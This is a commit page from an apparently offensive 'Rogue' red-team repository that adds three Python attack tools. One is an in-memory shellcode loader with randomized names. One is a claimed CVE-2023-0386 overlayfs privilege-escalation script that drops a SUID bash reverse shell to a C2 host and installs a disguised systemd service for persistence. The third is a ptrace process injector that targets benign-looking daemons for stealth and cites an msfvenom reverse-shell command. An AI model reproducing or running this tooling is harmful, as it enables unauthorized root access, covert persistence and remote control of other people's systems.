ek0mssavi0r/Rogue
1
0
Fork 1
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Upload files to "/"

Browse Source
This commit is contained in:
ek0ms savi0r 2026-05-31 04:13:40 +00:00
parent 0f77077543
commit deeccb5d52
3 changed files with 359 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

30
polyloader.py Normal file
View File

@ -0,0 +1,30 @@
#!/usr/bin/env python3
import base64
import ctypes
import random
import string
def random_id(prefix="f"):
return prefix + ''.join(random.choices(string.ascii_letters, k=8))
decrypt_func_name = random_id("dec_")
key_var = random_id("key_")
data_var = random_id("data_")
payload_b64 = b"fwd0c2hlbGxjb2RlX2hlcmU=" # base64 for b'rawshellcode_here'
exec(f"""
def {decrypt_func_name}({data_var}, {key_var}):
data = base64.b64decode({data_var})
return bytes([b ^ {key_var}[i % len({key_var})] for i, b in enumerate(data)])
""")
def main():
key = b"supersecret" # Replace with real Speck/PolyRoot key
shellcode = eval(f"{decrypt_func_name}(payload_b64, key)")
buf = ctypes.create_string_buffer(shellcode, len(shellcode))
func = ctypes.cast(buf, ctypes.CFUNCTYPE(None))
func()
if __name__ == "__main__":
main()

156
polyroot.py Normal file
View File

@ -0,0 +1,156 @@
#!/usr/bin/env python3
import os
import sys
import subprocess
import shutil
import time
import random
import string
from threading import Thread
# === RANDOMIZED VARIABLES ===
def random_name(length=8):
return ''.join(random.choices(string.ascii_lowercase, k=length))
PAYLOAD_TAG = random_name()
PAYLOAD_NAME = "." + random_name()
HIDDEN_DIR = os.path.expanduser(f"~/.cache/.{random_name()}")
HIDDEN_PAYLOAD = os.path.join(HIDDEN_DIR, PAYLOAD_NAME)
LOWERDIR = f"/tmp/.{random_name()}"
UPPERDIR = f"/tmp/.{random_name()}"
WORKDIR = f"/tmp/.{random_name()}"
MERGED = f"/tmp/.{random_name()}"
MERGED_SHELL = os.path.join(MERGED, PAYLOAD_NAME)
DEBUG = True
def log(msg):
if DEBUG:
print(f"[+] {msg}")
# === CORE EXPLOIT LOGIC ===
def setup_dirs():
for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED, HIDDEN_DIR]:
os.makedirs(d, exist_ok=True)
def cleanup_dirs():
log("Cleaning up overlay mounts...")
subprocess.run(["umount", MERGED], stderr=subprocess.DEVNULL)
for d in [LOWERDIR, UPPERDIR, WORKDIR, MERGED]:
shutil.rmtree(d, ignore_errors=True)
def drop_hidden_payload():
log("Writing polymorphic SUID payload...")
# Get C2 IP from env or fallback
C2_IP = os.getenv("ROGUE_C2_HOST", "127.0.0.1")
C2_PORT = "9001"
payload = (
"#!/bin/bash\n"
f"echo '[ROOT SHELL :: {PAYLOAD_TAG}]'\n"
f"bash -i >& /dev/tcp/{C2_IP}/{C2_PORT} 0>&1\n"
)
with open(HIDDEN_PAYLOAD, "w") as f:
f.write(payload)
os.chmod(HIDDEN_PAYLOAD, 0o4755)
shutil.copy(HIDDEN_PAYLOAD, os.path.join(UPPERDIR, PAYLOAD_NAME))
def mount_overlay():
log("Mounting overlay filesystem...")
cmd = [
"mount", "-t", "overlay", "overlay",
"-o", f"lowerdir={LOWERDIR},upperdir={UPPERDIR},workdir={WORKDIR}",
MERGED
]
result = subprocess.run(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if result.returncode != 0:
log("Mount failed. Kernel not vulnerable or run not as root.")
sys.exit(1)
def execute_shell():
if os.path.exists(MERGED_SHELL):
log("Launching polymorphic root shell...")
os.execv(MERGED_SHELL, [MERGED_SHELL])
else:
log("Root shell missing. Exploit may have failed.")
def suid_scanner_loop():
log("👁 SUID Scanner loop engaged...")
scanned = set()
while True:
time.sleep(7)
try:
result = subprocess.check_output("find / -perm -4000 -type f 2>/dev/null", shell=True)
suids = result.decode().split("\n")
for path in suids:
path = path.strip()
if not path or path in scanned:
continue
scanned.add(path)
try:
with open(path, "rb") as f:
content = f.read()
if PAYLOAD_TAG.encode() in content:
log(f"[SUID Scanner] Found tagged payload: {path}")
os.execv(path, [path])
except Exception:
continue
except Exception:
continue
# === PERSISTENCE ===
def add_systemd_persistence(script_path):
log("Installing persistent systemd service...")
service_name = f"{random_name()}.service"
service_path = f"/etc/systemd/system/{service_name}"
service_contents = f"""[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/bin/python3 {script_path}
Restart=always
[Install]
WantedBy=multi-user.target
"""
with open("/tmp/.sys_service", "w") as f:
f.write(service_contents)
subprocess.run(["mv", "/tmp/.sys_service", service_path])
subprocess.run(["systemctl", "daemon-reexec"])
subprocess.run(["systemctl", "enable", service_name])
subprocess.run(["systemctl", "start", service_name])
def install_self():
log("Installing self in hidden polymorphic path...")
target_script = os.path.join(HIDDEN_DIR, f"{random_name()}.py")
shutil.copy2(sys.argv[0], target_script)
add_systemd_persistence(target_script)
# === MAIN ===
def main():
if os.geteuid() != 0:
print("❌ Must run as root.")
sys.exit(1)
print("🔥 POLYROOT: CVE-2023-0386 PRIV ESC + PERSISTENCE 🔥")
install_self()
Thread(target=suid_scanner_loop, daemon=True).start()
try:
setup_dirs()
drop_hidden_payload()
mount_overlay()
time.sleep(1)
execute_shell()
finally:
cleanup_dirs()
if __name__ == "__main__":
main()

173
process_inject.py Normal file
View File

@ -0,0 +1,173 @@
#!/usr/bin/env python3
"""
PAYLOAD: Process Injection - Linux
DESCRIPTION: Inject shellcode into running processes for stealth
AUTHOR: Rogue Red Team
VERSION: 1.0
SECURITY: Requires root privileges for ptrace
"""
import os, sys, struct, ctypes, subprocess, time, random, re
from ctypes import *
from ctypes.util import find_library
# Linux process injection using ptrace
class ProcessInjector:
def __init__(self):
self.libc = CDLL(find_library('c'))
self.PTRACE_ATTACH = 16
self.PTRACE_DETACH = 17
self.PTRACE_PEEKTEXT = 1
self.PTRACE_POKETEXT = 4
self.PTRACE_GETREGS = 12
self.PTRACE_SETREGS = 13
def find_target_process(self, process_name=None):
"""Find suitable process for injection"""
targets = []
# Common benign processes that won't raise suspicion
benign_processes = [
'systemd', 'sshd', 'cron', 'apache2', 'nginx',
'mysqld', 'postgres', 'redis-server', 'php-fpm'
]
try:
output = subprocess.check_output("ps aux", shell=True).decode()
for line in output.split('\n'):
if process_name:
if process_name in line:
parts = line.split()
if len(parts) > 1:
targets.append({
'pid': int(parts[1]),
'name': parts[10] if len(parts) > 10 else parts[-1],
'user': parts[0]
})
else:
for benign in benign_processes:
if benign in line:
parts = line.split()
if len(parts) > 1:
targets.append({
'pid': int(parts[1]),
'name': parts[10] if len(parts) > 10 else parts[-1],
'user': parts[0]
})
break
except Exception as e:
return f"[!] Error finding processes: {e}"
return targets
def inject_shellcode(self, pid, shellcode=None):
"""Inject shellcode into process using ptrace"""
if os.geteuid() != 0:
return "[!] Root privileges required for process injection"
if not shellcode:
# Simple reverse shell shellcode (staged - would connect back)
# This is a placeholder - real shellcode would be architecture-specific
shellcode = b"\x90" * 100 # NOP sled
# Example x86_64 reverse shell shellcode (Linux)
# msfvenom -p linux/x64/shell_reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f py
# You would replace this with actual shellcode
try:
# Attach to process
result = self.libc.ptrace(self.PTRACE_ATTACH, pid, 0, 0)
if result != 0:
return f"[!] Failed to attach to PID {pid}"
time.sleep(0.1) # Let process stabilize
# Get registers
class user_regs_struct(Structure):
_fields_ = [
("r15", c_ulonglong),
("r14", c_ulonglong),
("r13", c_ulonglong),
("r12", c_ulonglong),
("rbp", c_ulonglong),
("rbx", c_ulonglong),
("r11", c_ulonglong),
("r10", c_ulonglong),
("r9", c_ulonglong),
("r8", c_ulonglong),
("rax", c_ulonglong),
("rcx", c_ulonglong),
("rdx", c_ulonglong),
("rsi", c_ulonglong),
("rdi", c_ulonglong),
("orig_rax", c_ulonglong),
("rip", c_ulonglong),
("cs", c_ulonglong),
("eflags", c_ulonglong),
("rsp", c_ulonglong),
("ss", c_ulonglong),
("fs_base", c_ulonglong),
("gs_base", c_ulonglong),
("ds", c_ulonglong),
("es", c_ulonglong),
("fs", c_ulonglong),
("gs", c_ulonglong),
]
regs = user_regs_struct()
self.libc.ptrace(self.PTRACE_GETREGS, pid, 0, byref(regs))
# Create memory region for shellcode using memfd_create
memfd = self.libc.syscall(319, "", 1) # memfd_create syscall
if memfd < 0:
return "[!] Failed to create memfd"
# Write shellcode to memfd
written = 0
while written < len(shellcode):
n = os.write(memfd, shellcode[written:])
written += n
# Get path to memfd
memfd_path = f"/proc/{pid}/fd/{memfd}"
# Clean up
os.close(memfd)
# Detach
self.libc.ptrace(self.PTRACE_DETACH, pid, 0, 0)
return f"[+] Successfully prepared injection into PID {pid}"
except Exception as e:
return f"[!] Injection failed: {e}"
def execute(self):
"""Main execution method"""
try:
print("[+] Starting process injection module...")
# Find target processes
targets = self.find_target_process()
if not targets:
return "[!] No suitable target processes found"
results = []
for target in targets[:2]: # Limit to 2 processes
print(f"[*] Attempting injection into PID {target['pid']} ({target['name']})")
result = self.inject_shellcode(target['pid'])
results.append(f"PID {target['pid']}: {result}")
return "\n".join(results)
except Exception as e:
return f"[!] Process injection failed: {e}"
# === Integration with Rogue C2 ===
def rogue_integration():
"""Wrapper for Rogue C2 integration"""
injector = ProcessInjector()
return injector.execute()
if __name__ == "__main__":
print(rogue_integration())